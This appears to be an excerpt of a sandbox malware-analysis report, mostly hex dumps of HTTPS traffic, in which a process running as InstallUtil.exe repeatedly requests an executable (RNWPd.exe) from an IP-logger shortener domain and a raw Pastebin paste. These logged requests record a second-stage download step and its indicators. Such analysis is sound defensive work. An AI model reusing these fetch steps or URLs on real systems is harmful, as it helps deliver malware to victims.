                                                2024-08-09 21:01:17 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:17 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.649732188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:18 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:18 UTC904INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:18 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:18 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LeXTNp%2B6Ku7FytX0ghOAulLWuy0CRc%2BpoNSFkpYDKDT%2BUdvmnvJJ3kYt%2BXKPnSjcfj76gBP%2F2BKRARTHmNJfrFE9vp9LpWi1bYQ7CRnoUeU1mAPF8b8hg8A%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae3de8f24314-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:18 UTC465INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:18 UTC1369INData Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f
                                                Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
                                                2024-08-09 21:01:18 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                                                Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
                                                2024-08-09 21:01:18 UTC1369INData Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e
                                                Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
                                                2024-08-09 21:01:18 UTC1369INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72
                                                Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
                                                2024-08-09 21:01:18 UTC1369INData Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20
                                                Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
                                                2024-08-09 21:01:18 UTC160INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.649733172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:23 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:23 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae5dffc08c63-EWR
                                                2024-08-09 21:01:23 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:23 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:23 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:23 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.649734188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:24 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:24 UTC900INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:24 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:24 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZYm59YX%2BhAAieGMRvJ1M%2BLx%2B4Cpj33EqclyynurfFy94Vo18a1KEo6guvrkMsffnxozye1dXdpPYggDT41yDJbIsPcPenzlFoAy6POJmMcgMRhCe5NUoFU%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae6218978cdd-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:24 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:24 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                                                Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                                                2024-08-09 21:01:24 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                                                Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                                                2024-08-09 21:01:24 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                                                Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
